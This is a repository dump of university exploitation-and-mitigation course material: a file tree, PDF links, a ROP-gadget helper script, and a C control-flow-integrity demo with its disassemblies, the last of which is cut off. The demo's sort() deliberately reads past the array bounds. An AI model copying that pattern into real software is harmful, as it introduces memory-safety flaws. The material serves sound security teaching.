├── [10]confused_deputy └── lab10.pdf ├── [11]fuzzing ├── lab11.pdf └── nukeland.map ├── [1]disclosure ├── lab1.pdf └── lab1_ARTEM_KALIAHIN.pdf ├── [2]stack_overflow ├── lab2.pdf └── lab2_ARTEM_KALIAHIN.pdf ├── [3]rop_gadgets ├── gadgets.py ├── lab3.pdf └── lab3_ARTEM_KALIAHIN.pdf ├── [4]blind_rop_attack ├── bittau-brop.pdf ├── lab4_ARTEM_KALIAHIN.pdf └── reading4.pdf ├── [5]stuxnet ├── video.pdf └── video5_ARTEM_KALIAHIN.pdf ├── [6]control_flow_integrity ├── cfi.dump ├── code.c ├── default.dump ├── lab6.pdf └── lab6_ARTEM_KALIAHIN.pdf ├── [7]heap_overflow ├── lab7.pdf └── lab7_ARTEM_KALIAHIN.pdf ├── [8]type_confusion_java └── lab8.pdf ├── [9]sql_injection ├── a.out ├── dump.py ├── dump.txt ├── first.txt ├── lab9.pdf ├── lab9_ARTEM_KALIAHIN.pdf ├── second.txt └── test.cpp ├── lecture00 └── lecture00.pdf ├── lecture01 ├── introduction.pdf └── lecture 01 - software vulnerabilities.pdf ├── lecture02 └── stack-overflow.pdf ├── lecture03 ├── DEP-expanded.pdf └── DEP.pdf ├── lecture04 └── aslr.pdf ├── lecture06 └── cfi.pdf ├── lecture07 └── heap-overflow.pdf ├── lecture08 └── type-confusion.pdf ├── lecture09 └── sql-injection.pdf ├── lecture10 └── confused-deputy.pdf ├── lecture11 └── fuzzing.pdf └── project └── Exploitation of a PoC type confusion in C++.pptx /[10]confused_deputy/lab10.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[10]confused_deputy/lab10.pdf -------------------------------------------------------------------------------- /[11]fuzzing/lab11.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[11]fuzzing/lab11.pdf -------------------------------------------------------------------------------- 
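/[11]fuzzing/nukeland.map: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[11]fuzzing/nukeland.map -------------------------------------------------------------------------------- /[1]disclosure/lab1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[1]disclosure/lab1.pdf -------------------------------------------------------------------------------- /[1]disclosure/lab1_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[1]disclosure/lab1_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[2]stack_overflow/lab2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[2]stack_overflow/lab2.pdf -------------------------------------------------------------------------------- /[2]stack_overflow/lab2_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[2]stack_overflow/lab2_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[3]rop_gadgets/gadgets.py: --------------------------------------------------------------------------------
# Lab 3 helper: pull the raw instruction bytes of an ELF's .text section and
# hand them to Capstone.  Written for Python 2 originally; print_function and
# binascii.unhexlify keep it working unchanged on Python 3 as well.
from __future__ import print_function

import binascii
import sys

from capstone import Cs, CS_ARCH_X86, CS_MODE_64
from elftools.elf.constants import SH_FLAGS          # not used in this file
from elftools.elf.elffile import ELFFile
from elftools.elf.relocation import RelocationSection  # not used in this file

##############################################################
# Sections whose bytes are extracted by default.  The original hard-coded
# ".text" only; .init/.plt/.fini are also executable and can be requested
# through the `sections` argument of getHexStreamsFromElfExecutableSections.
DEFAULT_SECTIONS = (".text",)


##############################################################
def convertXCS(s):
    """Decode a hex string of arbitrary (even) length into raw bytes for Capstone.

    Args:
        s: hex digits, e.g. "4883ec08" (str or bytes).

    Returns:
        The decoded byte string (str on Python 2, bytes on Python 3).

    Raises:
        ValueError: input shorter than one byte, odd number of digits, or a
            non-hex character.  The original returned 0 in the first two
            cases, which the caller then handed to the disassembler; raising
            keeps the error at its source.
    """
    if len(s) < 2:
        raise ValueError("Input too short!")
    if len(s) % 2 != 0:
        raise ValueError("Input must be multiple of 2!")
    # binascii.Error is a ValueError subclass, so bad digits surface the same
    # way as the length checks above.  Replaces the chr(int(b, 16)) loop,
    # which built a text string and so broke Capstone on Python 3.
    return binascii.unhexlify(s)


##############################################################
def getHexStreamsFromElfExecutableSections(filename, sections=DEFAULT_SECTIONS):
    """Collect the instruction bytes of the selected sections of an ELF file.

    Args:
        filename: path of the ELF binary to read.
        sections: names of the sections to extract (default: .text only).

    Returns:
        A list with one dict per matching section, in file order, with keys
        'name' (section name), 'addr' (sh_addr, where the section is loaded)
        and 'hexStream' (the section contents hex-encoded).
    """
    print("Processing file:", filename)
    wanted = set(sections)
    execSections = []
    # section.data() reads from the file, so the loop stays inside the with.
    with open(filename, 'rb') as f:
        elffile = ELFFile(f)
        for section in elffile.iter_sections():
            if section.name not in wanted:
                continue
            execSections.append({
                'name': section.name,
                'addr': section['sh_addr'],
                'hexStream': binascii.hexlify(section.data()),
            })
    return execSections


def main(argv):
    """Command-line entry point: ``gadgets.py --test <elf> [<elf> ...]``.

    Prints every extracted section and a disassembly of its first five bytes.

    Returns:
        Process exit status: 0 on success, 2 on a usage error (the original
        raised IndexError when run without arguments).
    """
    if len(argv) < 3 or argv[1] != '--test':
        print("usage: %s --test <elf-file> [<elf-file> ...]" % argv[0])
        return 2
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    for filename in argv[2:]:
        found = getHexStreamsFromElfExecutableSections(filename)
        print("Found ", len(found), " executable sections:")
        for i, s in enumerate(found):
            # hex() already supplies the 0x prefix (the original printed it twice).
            print(" ", i, ": ", s['name'], hex(s['addr']), s['hexStream'])
            # Preview the first five bytes of each section (the original only
            # looked at whichever section happened to be last), disassembled at
            # the section's load address so reported addresses are meaningful.
            gadget = convertXCS(s['hexStream'][0:10])
            for (address, size, mnemonic, op_str) in md.disasm_lite(gadget, s['addr']):
                print("gadget: %s %s \n" % (mnemonic, op_str))
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))
-------------------------------------------------------------------------------- /[3]rop_gadgets/lab3.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[3]rop_gadgets/lab3.pdf -------------------------------------------------------------------------------- /[3]rop_gadgets/lab3_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[3]rop_gadgets/lab3_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[4]blind_rop_attack/bittau-brop.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[4]blind_rop_attack/bittau-brop.pdf -------------------------------------------------------------------------------- 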
/[4]blind_rop_attack/lab4_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[4]blind_rop_attack/lab4_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[4]blind_rop_attack/reading4.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[4]blind_rop_attack/reading4.pdf -------------------------------------------------------------------------------- /[5]stuxnet/video.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[5]stuxnet/video.pdf -------------------------------------------------------------------------------- /[5]stuxnet/video5_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[5]stuxnet/video5_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[6]control_flow_integrity/cfi.dump: -------------------------------------------------------------------------------- 1 | 2 | cfi: file format elf64-x86-64 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 0000000000400370 <_init>: 8 | 400370: 48 83 ec 08 sub $0x8,%rsp 9 | 400374: 48 8b 05 7d 0c 20 00 mov 0x200c7d(%rip),%rax # 600ff8 <__gmon_start__> 10 | 40037b: 48 85 c0 test %rax,%rax 11 | 40037e: 74 02 je 400382 <_init+0x12> 12 | 400380: ff d0 callq *%rax 13 | 400382: 48 83 c4 08 add $0x8,%rsp 14 | 400386: c3 retq 15 | 16 | 
Disassembly of section .text: 17 | 18 | 0000000000400390 <_start>: 19 | 400390: 31 ed xor %ebp,%ebp 20 | 400392: 49 89 d1 mov %rdx,%r9 21 | 400395: 5e pop %rsi 22 | 400396: 48 89 e2 mov %rsp,%rdx 23 | 400399: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp 24 | 40039d: 50 push %rax 25 | 40039e: 54 push %rsp 26 | 40039f: 49 c7 c0 50 06 40 00 mov $0x400650,%r8 27 | 4003a6: 48 c7 c1 e0 05 40 00 mov $0x4005e0,%rcx 28 | 4003ad: 48 c7 c7 90 05 40 00 mov $0x400590,%rdi 29 | 4003b4: ff 15 36 0c 20 00 callq *0x200c36(%rip) # 600ff0 <__libc_start_main@GLIBC_2.2.5> 30 | 4003ba: f4 hlt 31 | 4003bb: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 32 | 33 | 00000000004003c0 <_dl_relocate_static_pie>: 34 | 4003c0: f3 c3 repz retq 35 | 4003c2: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 36 | 4003c9: 00 00 00 37 | 4003cc: 0f 1f 40 00 nopl 0x0(%rax) 38 | 39 | 00000000004003d0 : 40 | 4003d0: 55 push %rbp 41 | 4003d1: b8 28 10 60 00 mov $0x601028,%eax 42 | 4003d6: 48 3d 28 10 60 00 cmp $0x601028,%rax 43 | 4003dc: 48 89 e5 mov %rsp,%rbp 44 | 4003df: 74 17 je 4003f8 45 | 4003e1: b8 00 00 00 00 mov $0x0,%eax 46 | 4003e6: 48 85 c0 test %rax,%rax 47 | 4003e9: 74 0d je 4003f8 48 | 4003eb: 5d pop %rbp 49 | 4003ec: bf 28 10 60 00 mov $0x601028,%edi 50 | 4003f1: ff e0 jmpq *%rax 51 | 4003f3: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 52 | 4003f8: 5d pop %rbp 53 | 4003f9: c3 retq 54 | 4003fa: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 55 | 56 | 0000000000400400 : 57 | 400400: be 28 10 60 00 mov $0x601028,%esi 58 | 400405: 55 push %rbp 59 | 400406: 48 81 ee 28 10 60 00 sub $0x601028,%rsi 60 | 40040d: 48 89 e5 mov %rsp,%rbp 61 | 400410: 48 c1 fe 03 sar $0x3,%rsi 62 | 400414: 48 89 f0 mov %rsi,%rax 63 | 400417: 48 c1 e8 3f shr $0x3f,%rax 64 | 40041b: 48 01 c6 add %rax,%rsi 65 | 40041e: 48 d1 fe sar %rsi 66 | 400421: 74 15 je 400438 67 | 400423: b8 00 00 00 00 mov $0x0,%eax 68 | 400428: 48 85 c0 test %rax,%rax 69 | 40042b: 74 0b je 400438 70 | 40042d: 5d pop %rbp 71 | 40042e: bf 28 10 60 00 mov $0x601028,%edi 72 | 400433: 
ff e0 jmpq *%rax 73 | 400435: 0f 1f 00 nopl (%rax) 74 | 400438: 5d pop %rbp 75 | 400439: c3 retq 76 | 40043a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 77 | 78 | 0000000000400440 <__do_global_dtors_aux>: 79 | 400440: 80 3d e1 0b 20 00 00 cmpb $0x0,0x200be1(%rip) # 601028 <__TMC_END__> 80 | 400447: 75 17 jne 400460 <__do_global_dtors_aux+0x20> 81 | 400449: 55 push %rbp 82 | 40044a: 48 89 e5 mov %rsp,%rbp 83 | 40044d: e8 7e ff ff ff callq 4003d0 84 | 400452: c6 05 cf 0b 20 00 01 movb $0x1,0x200bcf(%rip) # 601028 <__TMC_END__> 85 | 400459: 5d pop %rbp 86 | 40045a: c3 retq 87 | 40045b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 88 | 400460: f3 c3 repz retq 89 | 400462: 0f 1f 40 00 nopl 0x0(%rax) 90 | 400466: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 91 | 40046d: 00 00 00 92 | 93 | 0000000000400470 : 94 | 400470: 55 push %rbp 95 | 400471: 48 89 e5 mov %rsp,%rbp 96 | 400474: 5d pop %rbp 97 | 400475: eb 89 jmp 400400 98 | 400477: 90 nop 99 | 400478: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 100 | 40047f: 00 101 | 102 | 0000000000400480 : 103 | 400480: 55 push %rbp 104 | 400481: 48 89 e5 mov %rsp,%rbp 105 | 400484: 89 7d fc mov %edi,-0x4(%rbp) 106 | 400487: 89 75 f8 mov %esi,-0x8(%rbp) 107 | 40048a: 8b 75 fc mov -0x4(%rbp),%esi 108 | 40048d: 3b 75 f8 cmp -0x8(%rbp),%esi 109 | 400490: 0f 9c c0 setl %al 110 | 400493: 24 01 and $0x1,%al 111 | 400495: 0f b6 c0 movzbl %al,%eax 112 | 400498: 5d pop %rbp 113 | 400499: c3 retq 114 | 40049a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 115 | 116 | 00000000004004a0 : 117 | 4004a0: 55 push %rbp 118 | 4004a1: 48 89 e5 mov %rsp,%rbp 119 | 4004a4: 89 7d fc mov %edi,-0x4(%rbp) 120 | 4004a7: 89 75 f8 mov %esi,-0x8(%rbp) 121 | 4004aa: 8b 75 fc mov -0x4(%rbp),%esi 122 | 4004ad: 3b 75 f8 cmp -0x8(%rbp),%esi 123 | 4004b0: 0f 9f c0 setg %al 124 | 4004b3: 24 01 and $0x1,%al 125 | 4004b5: 0f b6 c0 movzbl %al,%eax 126 | 4004b8: 5d pop %rbp 127 | 4004b9: c3 retq 128 | 4004ba: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 129 | 130 | 00000000004004c0 : 131 | 
4004c0: 55 push %rbp 132 | 4004c1: 48 89 e5 mov %rsp,%rbp 133 | 4004c4: 48 83 ec 30 sub $0x30,%rsp 134 | 4004c8: 48 b8 d0 05 40 00 00 movabs $0x4005d0,%rax 135 | 4004cf: 00 00 00 136 | 4004d2: 48 89 7d f8 mov %rdi,-0x8(%rbp) 137 | 4004d6: 89 75 f4 mov %esi,-0xc(%rbp) 138 | 4004d9: 48 89 55 e8 mov %rdx,-0x18(%rbp) 139 | 4004dd: 48 8b 55 e8 mov -0x18(%rbp),%rdx 140 | 4004e1: 48 89 d7 mov %rdx,%rdi 141 | 4004e4: 48 29 c7 sub %rax,%rdi 142 | 4004e7: 48 89 f8 mov %rdi,%rax 143 | 4004ea: 48 c1 e8 03 shr $0x3,%rax 144 | 4004ee: 48 c1 e7 3d shl $0x3d,%rdi 145 | 4004f2: 48 09 f8 or %rdi,%rax 146 | 4004f5: 48 83 f8 01 cmp $0x1,%rax 147 | 4004f9: 48 89 55 e0 mov %rdx,-0x20(%rbp) 148 | 4004fd: 76 02 jbe 400501 149 | 4004ff: 0f 0b ud2 150 | 400501: 48 8b 45 f8 mov -0x8(%rbp),%rax 151 | 400505: 48 63 4d f4 movslq -0xc(%rbp),%rcx 152 | 400509: 8b 3c 88 mov (%rax,%rcx,4),%edi 153 | 40050c: 48 8b 45 f8 mov -0x8(%rbp),%rax 154 | 400510: 8b 55 f4 mov -0xc(%rbp),%edx 155 | 400513: 83 c2 01 add $0x1,%edx 156 | 400516: 48 63 ca movslq %edx,%rcx 157 | 400519: 8b 34 88 mov (%rax,%rcx,4),%esi 158 | 40051c: 48 8b 45 e0 mov -0x20(%rbp),%rax 159 | 400520: ff d0 callq *%rax 160 | 400522: 31 d2 xor %edx,%edx 161 | 400524: 89 45 dc mov %eax,-0x24(%rbp) 162 | 400527: 89 d0 mov %edx,%eax 163 | 400529: 48 83 c4 30 add $0x30,%rsp 164 | 40052d: 5d pop %rbp 165 | 40052e: c3 retq 166 | 40052f: 90 nop 167 | 168 | 0000000000400530 : 169 | 400530: 55 push %rbp 170 | 400531: 48 89 e5 mov %rsp,%rbp 171 | 400534: 48 83 ec 20 sub $0x20,%rsp 172 | 400538: 48 b8 d0 05 40 00 00 movabs $0x4005d0,%rax 173 | 40053f: 00 00 00 174 | 400542: 48 89 7d f8 mov %rdi,-0x8(%rbp) 175 | 400546: 48 89 75 f0 mov %rsi,-0x10(%rbp) 176 | 40054a: 89 55 ec mov %edx,-0x14(%rbp) 177 | 40054d: 48 8b 7d f8 mov -0x8(%rbp),%rdi 178 | 400551: 8b 75 ec mov -0x14(%rbp),%esi 179 | 400554: 48 89 c2 mov %rax,%rdx 180 | 400557: e8 64 ff ff ff callq 4004c0 181 | 40055c: 48 ba d8 05 40 00 00 movabs $0x4005d8,%rdx 182 | 400563: 00 00 00 183 | 
400566: 48 8b 7d f0 mov -0x10(%rbp),%rdi 184 | 40056a: 8b 75 ec mov -0x14(%rbp),%esi 185 | 40056d: 89 45 e8 mov %eax,-0x18(%rbp) 186 | 400570: e8 4b ff ff ff callq 4004c0 187 | 400575: 31 f6 xor %esi,%esi 188 | 400577: 89 45 e4 mov %eax,-0x1c(%rbp) 189 | 40057a: 89 f0 mov %esi,%eax 190 | 40057c: 48 83 c4 20 add $0x20,%rsp 191 | 400580: 5d pop %rbp 192 | 400581: c3 retq 193 | 400582: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 194 | 400589: 00 00 00 195 | 40058c: 0f 1f 40 00 nopl 0x0(%rax) 196 | 197 | 0000000000400590
: 198 | 400590: 55 push %rbp 199 | 400591: 48 89 e5 mov %rsp,%rbp 200 | 400594: 48 81 ec 80 00 00 00 sub $0x80,%rsp 201 | 40059b: 48 8d 45 90 lea -0x70(%rbp),%rax 202 | 40059f: 48 8d 4d c0 lea -0x40(%rbp),%rcx 203 | 4005a3: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp) 204 | 4005aa: 89 7d f8 mov %edi,-0x8(%rbp) 205 | 4005ad: 48 89 75 f0 mov %rsi,-0x10(%rbp) 206 | 4005b1: 8b 55 f8 mov -0x8(%rbp),%edx 207 | 4005b4: 48 89 cf mov %rcx,%rdi 208 | 4005b7: 48 89 c6 mov %rax,%rsi 209 | 4005ba: e8 71 ff ff ff callq 400530 210 | 4005bf: 31 d2 xor %edx,%edx 211 | 4005c1: 89 45 8c mov %eax,-0x74(%rbp) 212 | 4005c4: 89 d0 mov %edx,%eax 213 | 4005c6: 48 81 c4 80 00 00 00 add $0x80,%rsp 214 | 4005cd: 5d pop %rbp 215 | 4005ce: c3 retq 216 | 4005cf: 90 nop 217 | 218 | 00000000004005d0 : 219 | 4005d0: e9 ab fe ff ff jmpq 400480 220 | 4005d5: cc int3 221 | 4005d6: cc int3 222 | 4005d7: cc int3 223 | 224 | 00000000004005d8 : 225 | 4005d8: e9 c3 fe ff ff jmpq 4004a0 226 | 4005dd: cc int3 227 | 4005de: cc int3 228 | 4005df: cc int3 229 | 230 | 00000000004005e0 <__libc_csu_init>: 231 | 4005e0: 41 57 push %r15 232 | 4005e2: 41 56 push %r14 233 | 4005e4: 49 89 d7 mov %rdx,%r15 234 | 4005e7: 41 55 push %r13 235 | 4005e9: 41 54 push %r12 236 | 4005eb: 4c 8d 25 5e 08 20 00 lea 0x20085e(%rip),%r12 # 600e50 <__frame_dummy_init_array_entry> 237 | 4005f2: 55 push %rbp 238 | 4005f3: 48 8d 2d 5e 08 20 00 lea 0x20085e(%rip),%rbp # 600e58 <__init_array_end> 239 | 4005fa: 53 push %rbx 240 | 4005fb: 41 89 fd mov %edi,%r13d 241 | 4005fe: 49 89 f6 mov %rsi,%r14 242 | 400601: 4c 29 e5 sub %r12,%rbp 243 | 400604: 48 83 ec 08 sub $0x8,%rsp 244 | 400608: 48 c1 fd 03 sar $0x3,%rbp 245 | 40060c: e8 5f fd ff ff callq 400370 <_init> 246 | 400611: 48 85 ed test %rbp,%rbp 247 | 400614: 74 20 je 400636 <__libc_csu_init+0x56> 248 | 400616: 31 db xor %ebx,%ebx 249 | 400618: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 250 | 40061f: 00 251 | 400620: 4c 89 fa mov %r15,%rdx 252 | 400623: 4c 89 f6 mov %r14,%rsi 253 | 400626: 
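44 89 ef mov %r13d,%edi 254 | 400629: 41 ff 14 dc callq *(%r12,%rbx,8) 255 | 40062d: 48 83 c3 01 add $0x1,%rbx 256 | 400631: 48 39 dd cmp %rbx,%rbp 257 | 400634: 75 ea jne 400620 <__libc_csu_init+0x40> 258 | 400636: 48 83 c4 08 add $0x8,%rsp 259 | 40063a: 5b pop %rbx 260 | 40063b: 5d pop %rbp 261 | 40063c: 41 5c pop %r12 262 | 40063e: 41 5d pop %r13 263 | 400640: 41 5e pop %r14 264 | 400642: 41 5f pop %r15 265 | 400644: c3 retq 266 | 400645: 90 nop 267 | 400646: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 268 | 40064d: 00 00 00 269 | 270 | 0000000000400650 <__libc_csu_fini>: 271 | 400650: f3 c3 repz retq 272 | 273 | Disassembly of section .fini: 274 | 275 | 0000000000400654 <_fini>: 276 | 400654: 48 83 ec 08 sub $0x8,%rsp 277 | 400658: 48 83 c4 08 add $0x8,%rsp 278 | 40065c: c3 retq 279 | -------------------------------------------------------------------------------- /[6]control_flow_integrity/code.c: --------------------------------------------------------------------------------
/* Lab 6 test program: a single indirect call whose targets are the two
 * comparators below.  Built twice, without CFI (default.dump) and with CFI
 * (cfi.dump), to compare how the indirect call in sort() is emitted. */
#include <stdio.h>   /* header names were lost in extraction ("#include" with no */
#include <stdlib.h>  /* argument); stdio.h/stdlib.h assumed, neither is used below */

/* The two legitimate targets of sort()'s indirect call. */
int lt(int x, int y) {
    return x < y;
}
int gt(int x, int y) {
    return x > y;
}

/* Calls the comparator through a function pointer -- the CFI demonstration
 * point.  In default.dump this is a plain `callq *%rdx`, so whatever f holds
 * is called.  In cfi.dump the compiler first checks that f is one of the two
 * slots of the jump table at 0x4005d0 (which forward to lt and gt) and traps
 * with ud2 otherwise, so a corrupted pointer cannot divert execution.
 * NOTE(review): a[len] and a[len+1] index past the end of an array holding
 * len elements; this is a minimal demo of the indirect call, not a sort. */
int sort(int a[], int len, int (*f)(int, int)) {
    (*f)(a[len], a[len+1]);
    return 0;
}

/* Passes the address of lt, then gt, as the comparator.  The page rendered
 * these arguments as `<` and `>`, consistent with `&lt` / `&gt` having been
 * decoded as HTML entities during extraction; the address-of forms are
 * restored here so the file compiles again. */
int sort2(int a[ ], int b[ ], int len) {
    sort( a, len, &lt );
    sort( b, len, &gt );
    return 0;
}

/* argc is used as the "length", so sort() reads ia[argc] and ia[argc+1] from
 * 10-element arrays that are never initialized: in bounds only for argc <= 8,
 * and the values compared are indeterminate either way.  argv is unused. */
int main(int argc, char** argv) {
    int ia[10];
    int ib[10];
    sort2(ia, ib, argc);
    return 0;
}
-------------------------------------------------------------------------------- /[6]control_flow_integrity/default.dump: -------------------------------------------------------------------------------- 1 | 2 | default: file format elf64-x86-64 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 0000000000400370 <_init>: 8 | 400370: 48 83 ec 08 sub $0x8,%rsp 9 | 400374: 48 8b 05 7d 0c 20 00 mov 0x200c7d(%rip),%rax # 600ff8 <__gmon_start__> 10 | 40037b: 48 85 c0 test %rax,%rax 11 | 40037e: 74 02 je 400382 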
<_init+0x12> 12 | 400380: ff d0 callq *%rax 13 | 400382: 48 83 c4 08 add $0x8,%rsp 14 | 400386: c3 retq 15 | 16 | Disassembly of section .text: 17 | 18 | 0000000000400390 <_start>: 19 | 400390: 31 ed xor %ebp,%ebp 20 | 400392: 49 89 d1 mov %rdx,%r9 21 | 400395: 5e pop %rsi 22 | 400396: 48 89 e2 mov %rsp,%rdx 23 | 400399: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp 24 | 40039d: 50 push %rax 25 | 40039e: 54 push %rsp 26 | 40039f: 49 c7 c0 20 06 40 00 mov $0x400620,%r8 27 | 4003a6: 48 c7 c1 b0 05 40 00 mov $0x4005b0,%rcx 28 | 4003ad: 48 c7 c7 70 05 40 00 mov $0x400570,%rdi 29 | 4003b4: ff 15 36 0c 20 00 callq *0x200c36(%rip) # 600ff0 <__libc_start_main@GLIBC_2.2.5> 30 | 4003ba: f4 hlt 31 | 4003bb: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 32 | 33 | 00000000004003c0 <_dl_relocate_static_pie>: 34 | 4003c0: f3 c3 repz retq 35 | 4003c2: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 36 | 4003c9: 00 00 00 37 | 4003cc: 0f 1f 40 00 nopl 0x0(%rax) 38 | 39 | 00000000004003d0 : 40 | 4003d0: 55 push %rbp 41 | 4003d1: b8 28 10 60 00 mov $0x601028,%eax 42 | 4003d6: 48 3d 28 10 60 00 cmp $0x601028,%rax 43 | 4003dc: 48 89 e5 mov %rsp,%rbp 44 | 4003df: 74 17 je 4003f8 45 | 4003e1: b8 00 00 00 00 mov $0x0,%eax 46 | 4003e6: 48 85 c0 test %rax,%rax 47 | 4003e9: 74 0d je 4003f8 48 | 4003eb: 5d pop %rbp 49 | 4003ec: bf 28 10 60 00 mov $0x601028,%edi 50 | 4003f1: ff e0 jmpq *%rax 51 | 4003f3: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 52 | 4003f8: 5d pop %rbp 53 | 4003f9: c3 retq 54 | 4003fa: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 55 | 56 | 0000000000400400 : 57 | 400400: be 28 10 60 00 mov $0x601028,%esi 58 | 400405: 55 push %rbp 59 | 400406: 48 81 ee 28 10 60 00 sub $0x601028,%rsi 60 | 40040d: 48 89 e5 mov %rsp,%rbp 61 | 400410: 48 c1 fe 03 sar $0x3,%rsi 62 | 400414: 48 89 f0 mov %rsi,%rax 63 | 400417: 48 c1 e8 3f shr $0x3f,%rax 64 | 40041b: 48 01 c6 add %rax,%rsi 65 | 40041e: 48 d1 fe sar %rsi 66 | 400421: 74 15 je 400438 67 | 400423: b8 00 00 00 00 mov $0x0,%eax 68 | 400428: 48 85 c0 test %rax,%rax 
69 | 40042b: 74 0b je 400438 70 | 40042d: 5d pop %rbp 71 | 40042e: bf 28 10 60 00 mov $0x601028,%edi 72 | 400433: ff e0 jmpq *%rax 73 | 400435: 0f 1f 00 nopl (%rax) 74 | 400438: 5d pop %rbp 75 | 400439: c3 retq 76 | 40043a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 77 | 78 | 0000000000400440 <__do_global_dtors_aux>: 79 | 400440: 80 3d e1 0b 20 00 00 cmpb $0x0,0x200be1(%rip) # 601028 <__TMC_END__> 80 | 400447: 75 17 jne 400460 <__do_global_dtors_aux+0x20> 81 | 400449: 55 push %rbp 82 | 40044a: 48 89 e5 mov %rsp,%rbp 83 | 40044d: e8 7e ff ff ff callq 4003d0 84 | 400452: c6 05 cf 0b 20 00 01 movb $0x1,0x200bcf(%rip) # 601028 <__TMC_END__> 85 | 400459: 5d pop %rbp 86 | 40045a: c3 retq 87 | 40045b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 88 | 400460: f3 c3 repz retq 89 | 400462: 0f 1f 40 00 nopl 0x0(%rax) 90 | 400466: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 91 | 40046d: 00 00 00 92 | 93 | 0000000000400470 : 94 | 400470: 55 push %rbp 95 | 400471: 48 89 e5 mov %rsp,%rbp 96 | 400474: 5d pop %rbp 97 | 400475: eb 89 jmp 400400 98 | 400477: 66 0f 1f 84 00 00 00 nopw 0x0(%rax,%rax,1) 99 | 40047e: 00 00 100 | 101 | 0000000000400480 : 102 | 400480: 55 push %rbp 103 | 400481: 48 89 e5 mov %rsp,%rbp 104 | 400484: 89 7d fc mov %edi,-0x4(%rbp) 105 | 400487: 89 75 f8 mov %esi,-0x8(%rbp) 106 | 40048a: 8b 75 fc mov -0x4(%rbp),%esi 107 | 40048d: 3b 75 f8 cmp -0x8(%rbp),%esi 108 | 400490: 0f 9c c0 setl %al 109 | 400493: 24 01 and $0x1,%al 110 | 400495: 0f b6 c0 movzbl %al,%eax 111 | 400498: 5d pop %rbp 112 | 400499: c3 retq 113 | 40049a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 114 | 115 | 00000000004004a0 : 116 | 4004a0: 55 push %rbp 117 | 4004a1: 48 89 e5 mov %rsp,%rbp 118 | 4004a4: 89 7d fc mov %edi,-0x4(%rbp) 119 | 4004a7: 89 75 f8 mov %esi,-0x8(%rbp) 